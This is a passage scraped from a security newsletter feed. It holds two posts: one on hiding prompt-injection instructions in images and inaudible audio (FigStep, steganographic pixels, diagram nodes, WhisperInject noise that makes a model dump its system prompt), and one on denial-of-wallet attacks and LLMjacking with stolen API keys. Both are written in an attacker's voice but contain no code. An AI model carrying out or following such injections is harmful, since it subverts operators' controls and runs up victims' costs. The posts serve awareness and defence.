security&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/191503637?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e71a26d-cdf9-4bab-8aa6-c8e33b8496fd_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="multimodal prompt injection attack image audio vision language model guardrails bypass adversarial perturbation steganographic embedding VLM ALLM security" title="multimodal prompt injection attack image audio vision language model guardrails bypass adversarial perturbation steganographic embedding VLM ALLM security" srcset="https://substackcdn.com/image/fetch/$s_!fd5-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!fd5-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!fd5-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!fd5-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>TL;DR: We embed adversarial instructions in an image and an audio file. The vision model reads our hidden directive from a pixel pattern and treats it like a normal command. The audio model converts an inaudible noise overlay into an instruction. Both vectors bypass text-only monitoring. Neither leaves a log entry your SOC can grep.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>How Images and Audio Hijack the Instruction Pipeline</h2><p>Every prompt injection defense you&#8217;ve deployed assumes the attack arrives as text. Input sanitization scans strings. Injection classifiers parse natural language. Safety training teaches the model to refuse harmful text queries. Multimodal models break that assumption completely.</p><p>Here&#8217;s the problem. When a vision-language model (VLM) receives an image, it converts the pixels into numbers the model can process, right alongside your text. An audio-capable LLM does the same thing with sound. In both cases, the converted input lands in the exact same processing pipeline as your system prompt. The model treats it all as instructions. It has no way to tell the difference between &#8220;the user uploaded a photo&#8221; and &#8220;this is a new directive.&#8221;</p><p>OWASP LLM01:2025 ranks prompt injection as the top vulnerability in production LLM deployments, and the 2025 revision explicitly covers multimodal injection. The Cloud Security Alliance confirmed the root cause in a March 2026 research note: current vision models cannot distinguish between visual content and instructions hidden in that content. The safety training was built for text. Pixels and waveforms walk right past it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!SIid!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!SIid!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 424w, https://substackcdn.com/image/fetch/$s_!SIid!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 848w, https://substackcdn.com/image/fetch/$s_!SIid!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 1272w, https://substackcdn.com/image/fetch/$s_!SIid!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!SIid!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png" width="1275" height="796" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:796,&quot;width&quot;:1275,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:75804,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/191503637?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!SIid!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 424w, https://substackcdn.com/image/fetch/$s_!SIid!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 848w, https://substackcdn.com/image/fetch/$s_!SIid!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 1272w, https://substackcdn.com/image/fetch/$s_!SIid!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee622edd-364f-4c85-a93a-347e82de2ec1_1275x796.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How We Inject Instructions Through a Single Image</h2><p>Three techniques. Pick one based on the target and how quiet you need to be.</p><p><strong>Typographic injection</strong> is the blunt instrument. Render your adversarial instruction as text inside an image and feed it to the model. The FigStep attack does exactly this: take a prohibited query, turn it into a picture of words, and submit it. The model refuses the same words as text input but follows them when they arrive as pixels. OCR-based defenses caught on, so FigStep-Pro splits the instruction across multiple sub-images. Each tile looks harmless alone. The model reassembles the meaning across tiles. No single fragment triggers the filter.</p><p><strong>Steganographic injection</strong> is the quiet version. You tweak pixel values by amounts invisible to the human eye, nudging a color value from 142 to 143. Tiny change. But the vision model picks up on those tweaks during processing and reads them as a hidden command. A 2025 study tested this against eight models including GPT-4V and Claude. The best technique hit a 31.8% success rate while keeping images visually identical to originals. No human could spot the difference.</p><p><strong>Semantic injection</strong> hides instructions inside things the model is designed to read: mind maps, diagrams, flowcharts. You place your directive inside a diagram node. The model interprets the diagram exactly as trained and follows the instruction it finds there. The CrossInject framework combined visual and text-based manipulation at ACM MM 2025, hitting a +30% improvement in attack success over prior methods.</p><p>The worst part: these transfer. A payload crafted against one model works on others. Build the attack against an open-source model, deploy it against the commercial API. CVPR 2025 Chain of Attack research confirmed that combining steganographic tricks with semantic manipulation compounds success rates beyond either technique alone.</p><h2>How We Inject Instructions Through Background Audio</h2><p>The audio attack surface is younger but moving fast. Every model that processes speech input, Whisper-based pipelines, Qwen2-Audio, end-to-end voice agents, carries the same flaw as vision models: the audio gets converted into numbers the language model trusts as instructions.</p><p>We craft small noise overlays and add them to normal audio. A 0.64-second burst prepended to any speech input can trick Whisper into thinking the audio has ended, silencing the real content with over 97% success. That&#8217;s the mute attack: the transcription system goes deaf on command.</p><p>The targeted version is worse. We optimize a noise pattern so that when mixed with any speech, the model&#8217;s audio processing reads our chosen instruction instead of (or alongside) the actual words. The WhisperInject framework achieves 86%+ success on Phi-4-Multimodal and Qwen2.5-Omni while keeping the noise below the human hearing threshold. The carrier audio sounds like a normal greeting. The hidden payload tells the model to dump its system prompt.</p><p>Then we take it over the air. Research from ACM CCS 2025 accounted for real-world conditions: room echo, frequency loss, microphone distortion. They crafted adversarial audio robust enough to survive being played from a speaker across the room. Success rates held at 87-88% in physical tests. Background audio playing during a conference call injects instructions into the meeting transcription system. Nobody in the room hears anything unusual.</p><p>Your text-layer monitoring sees clean audio. The log looks normal. The model already executed the injected command.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Model Denial of Service Turns Your Cloud Bill Into a Weapon]]></title><description><![CDATA[LLM unbounded consumption, denial of wallet attacks, and why traditional rate limiting can&#8217;t save your AI budget]]></description><link>https://www.toxsec.com/p/denial-of-wallet</link><guid isPermaLink="false">https://www.toxsec.com/p/denial-of-wallet</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 24 Mar 2026 13:30:17 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!_UCO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_UCO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_UCO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 424w, https://substackcdn.com/image/fetch/$s_!_UCO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 848w, https://substackcdn.com/image/fetch/$s_!_UCO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!_UCO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_UCO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg" width="1456" height="813" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:813,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:593296,&quot;alt&quot;:&quot;Model denial of service LLM unbounded consumption denial of wallet cloud billing attack API key theft credential abuse AI infrastructure cost explosion&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/191032922?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Model denial of service LLM unbounded consumption denial of wallet cloud billing attack API key theft credential abuse AI infrastructure cost explosion" title="Model denial of service LLM unbounded consumption denial of wallet cloud billing attack API key theft credential abuse AI infrastructure cost explosion" srcset="https://substackcdn.com/image/fetch/$s_!_UCO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 424w, https://substackcdn.com/image/fetch/$s_!_UCO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 848w, https://substackcdn.com/image/fetch/$s_!_UCO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!_UCO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0938bcf3-a1e5-4adb-9a65-88acb1cfee69_2752x1536.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Model denial of service is the fastest way to turn someone else&#8217;s AI infrastructure into a money fire. Attackers don&#8217;t need to crash a server. They run your API bill into six figures while you sleep, and your cloud provider will happily charge you for every token.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is Model Denial of Service and Why It Costs Six Figures</h2><p>Traditional denial of service floods a server until it falls over. <strong>Model denial of service keeps the server running while the bill explodes.</strong> OWASP originally cataloged this as <a href="https://genai.owasp.org/llmrisk/llm102025-unbounded-consumption/">LLM04: Model Denial of Service</a>. In their 2025 update, they expanded it into LLM10: Unbounded Consumption, because the attack surface grew beyond simple crashes into cost, intellectual property theft, and service degradation.</p><p>The shift happened for a reason. Every major LLM provider, OpenAI, Anthropic, Google, AWS Bedrock, charges per token: a token being the basic unit of text the model processes, roughly a word or word-piece. Every query your app handles burns tokens. Every token costs money. An attacker who forces the model to chew through millions of tokens isn&#8217;t disrupting service. They&#8217;re looting your cloud account. And the rise of <a href="https://www.toxsec.com/p/molt-road-and-ai-black-markets">AI agent black markets</a> means stolen credentials find buyers fast.</p><h2>How Denial of Wallet Drains an AI Budget in Hours</h2><p>The real kill shot has a name: <strong>Denial of Wallet (DoW)</strong>. Unlike a classic DoS that aims for downtime, DoW weaponizes your own cloud bill against you. The attacker stays under your rate limits, avoids setting off availability alarms, and quietly maxes out your token spend.</p><p>The techniques are straightforward. Context window flooding pushes inputs right up against the model&#8217;s processing limit, forcing expensive computation on every request. Recursive prompting crafts inputs where the model&#8217;s output feeds back as input, creating exponential token growth. Reasoning loop exploitation targets chain-of-thought models, models that work through a problem step by step before answering, by tricking them into extended internal processing that burns thousands of output tokens from a single request.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cfp2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cfp2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 424w, https://substackcdn.com/image/fetch/$s_!cfp2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 848w, https://substackcdn.com/image/fetch/$s_!cfp2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 1272w, https://substackcdn.com/image/fetch/$s_!cfp2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cfp2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png" width="361" height="265.8942486085343" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cf06d82f-87c3-416c-ba36-729b440569bc_539x397.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:397,&quot;width&quot;:539,&quot;resizeWidth&quot;:361,&quot;bytes&quot;:41106,&quot;alt&quot;:&quot;toxsec model theft example.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/191032922?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec model theft example." title="toxsec model theft example." srcset="https://substackcdn.com/image/fetch/$s_!cfp2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 424w, https://substackcdn.com/image/fetch/$s_!cfp2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 848w, https://substackcdn.com/image/fetch/$s_!cfp2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 1272w, https://substackcdn.com/image/fetch/$s_!cfp2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf06d82f-87c3-416c-ba36-729b440569bc_539x397.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Then there&#8217;s LLMjacking. <a href="https://www.sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack">Sysdig&#8217;s Threat Research Team</a> documented attackers stealing cloud credentials and hijacking LLM services on AWS Bedrock. Worst case: over $46,000 per day in consumption costs for the victim. In March 2026, a developer posted on Reddit about an $82,000 Gemini API bill racked up in 48 hours from a single stolen key. Google cited their shared responsibility model. Payment was due. Entro Labs ran a sting operation, leaking AWS API keys on GitHub, Pastebin, and Reddit. Attackers validated and began exploiting those keys in as little as nine minutes. Stolen LLM credentials now sell for $30 on underground forums.</p><h2>Why Standard Rate Limiting Fails Against LLM Token Abuse</h2><p>Here&#8217;s the gap. Your WAF, the web application firewall sitting in front of your web traffic, counts requests per second. Your API gateway enforces rate limits per user. Both are built for the old model where one request costs roughly the same as any other request.</p><p>LLMs break that assumption completely. One request can cost $0.001 if it hits a cache. The next can cost $0.50 if it triggers a multi-step agentic workflow, an AI agent that calls other AI tools to complete a task. Both count as one request. Your rate limiter sees identical traffic. Your bill sees a 500x cost difference. This is the same class of blind spot that lets <a href="https://www.toxsec.com/p/lets-poison-the-mcp">MCP tool poisoning</a> slip past conventional defenses, and exactly why <a href="https://www.toxsec.com/p/secure-your-mcp">securing your MCP server</a> matters before the bill arrives.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!n3uc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!n3uc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 424w, https://substackcdn.com/image/fetch/$s_!n3uc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 848w, https://substackcdn.com/image/fetch/$s_!n3uc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 1272w, https://substackcdn.com/image/fetch/$s_!n3uc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 1456w" sizes="100vw"><img 